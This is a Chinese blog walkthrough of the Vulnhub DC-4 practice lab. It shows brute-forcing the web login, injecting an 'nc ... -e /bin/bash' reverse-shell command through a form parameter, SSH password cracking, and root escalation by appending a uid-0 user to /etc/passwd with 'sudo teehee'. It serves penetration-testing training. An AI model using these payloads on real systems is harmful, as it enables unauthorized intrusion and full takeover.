靶场DC-4

已于 2023-06-20 11:08:21 修改
阅读量87 收藏
点赞数 1
文章标签: 网络安全 网络 web安全 linux
于 2023-06-11 21:28:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50340347/article/details/131158129
版权

0x01信息收集

arp-scan -l扫描局域网设备,发现我们靶场的ip地址是192,168.190.140
在这里插入图片描述对192.168.190.140进行详细扫描,发现其开放的端口号和对应的服务,开放22端口的SSH服务和80端口的http服务。
在这里插入图片描述直接用浏览器访问下靶场的ip地址,发现这是一个用户登录页面,并且通过查看源代码发现这仅是一个单纯的登陆界面,那么基本思路就是想办法获取他的用户名和密码,用户名可以尝试常用的admin,接下来就是怎么获取密码?这里可以尝试使用burpsuite进行密码爆破。
在这里插入图片描述

0x02靶场攻击

这里需要进行一个暴力破解,这里可以考验我们字典的强大,用burpsuite爆破,首先打开burpsuite并开启抓包,页面中选择bp代理模式,尝试输入用户名:admin和随意的密码,提交以后便拦截到了数据包。
在这里插入图片描述接下来就是对密码进行爆破,这里只标记密码位,对这个位置进行密码字典的替换和遍历。
在这里插入图片描述导入密码字典
在这里插入图片描述开始进行爆破,字典的强大决定了能不能跑车正确密码,这里爆出来的密码:happy,账号:admin
在这里插入图片描述尝试使用用户:admin、密码:happy,进行登录,成功登进去了。接下来的思路就是如何才能获得对方的shell,也就是怎么实现反弹shell。
在这里插入图片描述

0x03反弹shell

这里实现反弹shell也是用burpsuite抓包,利用nc反弹shell。修改抓取的数据包,发现radio位置的原值就是对应的列出ls -l等Linux命令,只不过将这里的空格替换成了+的连接符,所以尝试修改此处的值,将radio的位置信息进行修改:nc+192.168.190.128+4444±e+/bin/bash ,同时kali开启nc监听进行等待反弹。以上操作均完成以后就可以forward放包了。
说明:这里面的 + 表示连接符,就是代替空格的作用。 -e:程序重定向,一旦连接就执行,这里执行的是/bin/bash这个登录shell指令。ip:要让他它主动连接并返回shell的ip 。 4444:是端口号,自定义。等同于在linux 执行:nc 192.168.190.128 4444 -e /bin/bash.
在这里插入图片描述在这里插入图片描述反弹成功以后,开启shell交互。python -c “import pty;pty.spawn(‘/bin/bash’)”
在这里插入图片描述

0x04密码爆破

开始查询各个目录,搜寻有用信息,经查在/home目录下发现了3个用户,当然可以先看一下/etc/passwd下的用户信息,并且在jim目录下发现了一个旧密码的备份文件,把这个密码备份文件拷贝到本地,后续用于SSH密码爆破的密码字典,同时将这3个用户名生成一个用户名字典。其他的就没有可利用的信息。
在这里插入图片描述也就是说我们目前只有一个旧密码本和用户名信息,关联之前嗅探到的开放的ssh服务,也许可以尝试进行ssh密码爆破,经hydra爆破以后得到:用户名:jim 密码:jibril04,(这里不赘述此过程),用此密码账户登录SSH。
在这里插入图片描述登录SSH以后先sudo -l 看一下当前的用户有什么特权指令可以执行,发现并没有,所以要找其他的信息来提权,在/var/mail下有一个jim文件.
在这里插入图片描述在这里插入图片描述查看jim文件以后得到另一个用户名和密码,用户名:charles 密码:^xHhA&hvim0y
在这里插入图片描述尝试切换用户charles,切换成功以后,sudo -l 查看下当前用户有什么特殊权限,发现他能执行teehee指令。
在这里插入图片描述具体看一下teehee指令怎么用???teehee --help,它是一个追加内容到给定文件中的指令,所以就考虑是否可以使用这个指令进行提权,基本思路就是能不能用这个指令向/etc/passwd中写入一个更高权限的用户。
在这里插入图片描述在这里插入图片描述

0x005提权

要写入一个新用户,根据Linux用户字段格式,首先要生成linux用户字段的加密密码,这里使用的是Perl语句,指令:perl -le ‘print crypt(“原密码”,"salt“)’,接下来就是如何利用这个指令写入的问题了,
在这里插入图片描述经查询以下是teehee指令的使用方法:

echo  zyh:sahL5d5V.UWtI:0:0::/home/zyh:/bin/bash  | sudo teehee -a  /etc/passwd

在这里插入图片描述
成功以后,su zyh 切换用户,id查看下当前用户的uid,发现已经是root权限了。
在这里插入图片描述进入/root目录,得到最终的flag.txt。到此结束
在这里插入图片描述

0x006总结

1.利用burpsuite抓包,NC反弹shell
在这里插入图片描述2.生成Linux用户加密密码

这里使用的是Perl语句,指令:perl -le 'print  crypt("原密码","salt“)'

openssl passwd的作用是用来计算密码hash的,目的是为了防止密码以明文的形式出现。
    语法格式: openssl passwd [option] passwd
    openssl passwd常用的选项如下:
    -1:表示采用的是MD5加密算法。
    -salt:指定salt值(加盐),不使用随机产生的salt。在使用加密算法进行加密时,即使密码一样,salt不一样,所计算出来的hash值也不一样,除非密码一样,salt值也一样,计算出来的hash值才一样。salt为8字节的字符串。
    示例:
    [tom@localhost ~]$ openssl passwd -1 -salt  '12345678'   ##注意‘12345678’不是密码而是密码的长度
    Password:      ##这里输入的是密码
    $1$12345678$1qWiC4czIc07B4J8bPjfC0    ##这是生成的密文密码
    ##将生成的密码串,手动添加到/etc/shadow中就可用作用户的登陆密码了。

3.teehee指令的使用
以下是teehee指令的使用方法:

echo  zyh:sahL5d5V.UWtI:0:0::/home/zyh:/bin/bash  | sudo teehee -a  /etc/passwd

在这里插入图片描述

404_白薯
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
二、BurpSuite Scan扫描
黑日里不灭的light
09-30 325
解释:选择只是爬行还是爬行加代码审计。
【Vulnhub靶机】DC-4(sudo teehee提权)
过期的秋刀鱼
08-04 241
12、可是试着复制一下这个密码本里的东西,保存到一个文件里,尝试密码爆破,因为这个密码本是在jim的家目录找到的,还开了ssh远程服务,可以用hydra九头蛇破解一下。发现开放了80端口和ssh,浏览器访问靶机的80端口,看看有没有可以利用的东西。10、继续查看每个用户的家目录,发现只有jim用户家目录有数据。13、用爆破出来的密码进行ssh连接 ,显示有已邮件。8、然后试着修改一下radio后面的值,发现可以执行命令。16、通过邮件内容,可以知道Charles 的密码,6、可以试着再次用bp抓包。
DC-4靶机渗透(teehee提权)
single_g_l的博客
03-26 4830
一、环境 靶机: 192.168.1.177 攻击机: 192.168.1.209 二、信息收集 1. 主机发现 namp -sP 192.168.1.0/24 或 arp-scan -l # 查看开放端口 nmap -A -sS -p- 192.168.1.177 2. 访问192.168.1.177:80 三、拿到管理后台密码 方法1. 用burp爆破模块,获取管理员登录界面的密码 01. 用burp抓包,爆破拿到密码(记得准备一个常用密码合集,...
【Vulnhub靶机渗透测试】之DC-4(teehee命令提权(在passwd或crontab中追加内容))
Pluto.的博客
12-28 1001
文章目录Vulnhub靶机渗透测试之DC-2 Vulnhub靶机渗透测试之DC-2 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-2,311/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.142。 ...
Vulnhub DC-4 teehee 提权
ST0new的博客
07-21 1634
Vulnhub 之 DC-4 本文只用于学习知识,不要将其用于非法途径, 前言 DC已经做了一半了,前三次都是基于初学者的,这次的难度就提升了,适合初学者和入门的伙伴。 还是按照常例看看作者是怎么描述的吧。 下载地址 DC-4 描述 DC-4是另一个专门建造的脆弱实验室,目的是获得渗透测试领域的经验。 ​ 与以前的DC版本不同,这个版本主要是为初学者/中间用户设计的。只有一面旗帜,但技术上来说,有...
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1166
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulnhub靶场----4、DC-4
七天
02-22 956
Vulnhub-DC4
靶场系列-DC-1
kkk2426的博客
07-20 169
DC靶场是前面逛论坛的时候,看到有大佬在打的靶场,恰好新换了的硬盘,空间也够了,也就部署下来,尝试进行测试。DC靶场系列会涉及到拿到flag,DC-1共有5个flag。本次靶场的测试,也让我获益良多,最主要的还是对以前一些遗忘的操作的回忆。官网地址: https://download.vulnhub.com/dc/DC-1.zip先讲一下收获吧:1、熟悉namp信息收集;2、熟悉searchexploit操纵,实操上手;3、熟悉msf操作;4、学习提权;
DC-4靶场实战详解
a310034188的博客
02-28 2897
DC-4靶场实战详解
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-4实战
05-22
vuInhub靶场实战系列-DC-4实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8418
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
MPLS相关实验
2302_78454622的博客
08-20 597
4、R1上使用静态,R7上运行rip协议,R8上运行ospf协议。3、在R2、R3、R4、R5、R6上运行MPLS。2、R3、R4、R5、R6运行ospf。1、合理利用IP地址进行分配。一、实验拓扑图以及实验要求。一、实验拓扑图以及实验要求。
浏览器发送HTTP请求的过程
最新发布
学Python的小白!
08-25 1167
浏览器发送HTTP请求的过程是一个复杂但有序的步骤,‌主要包括以下几个阶段:‌1.构建请求,2.查找缓存、3.DNS解析、4.建立TCP连接、5.发送HTTP请求、6.服务器处理请求、7.服务器发送响应、8.客户端处理响应、9.关闭连接。
哪些类型的企业需要开展TPM管理培训?
tianxingjian713的博客
08-23 883
例如汽车制造企业、电子制造企业等,这些企业的生产线通常由大量高精度的自动化设备组成,一旦设备出现故障,可能会导致整个生产线停产,造成巨大的经济损失。开展TPM管理培训可以提高员工对设备的维护和管理能力,延长设备的使用寿命,降低设备维修成本,提高物流服务的效率和质量。通过开展TPM管理培训,让设备操作人员、维护人员和管理人员共同参与设备维护,实现设备的零故障运行,从而提高企业的竞争力。通过开展TPM管理培训,让员工了解设备的运行原理和风险点,加强设备的日常巡检和维护,提高设备的安全性和可靠性。
系统编程 网络 http协议
qq_69971969的博客
08-24 427
--------------------------------------表示了资源所在的路径。意思:域名解析=>把对应的域名解析为对应的ip。<协议>://<主机>:<端口>/<路径>万维网:http解决万维网之间互联互通。http:应用层协议,底层是tcp协议。http协议------应用层的协议。1.如何在万维网中表示一个资源?http协议加密:tls,ssl。计算机web网络只能看到文字。<http>只是协议的一种。html 超文本标记语言。http 超文本传输协议。
DC-1靶场攻防:信息收集与Drupal漏洞挖掘
"DC-1靶场的攻防演练教程" 在网络安全领域,靶场是进行安全测试和技能提升的重要平台。本教程聚焦于名为DC-1的靶机,通过一系列步骤来展示如何找到并利用靶机上的漏洞来获取flag。下面我们将详细探讨这个过程。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值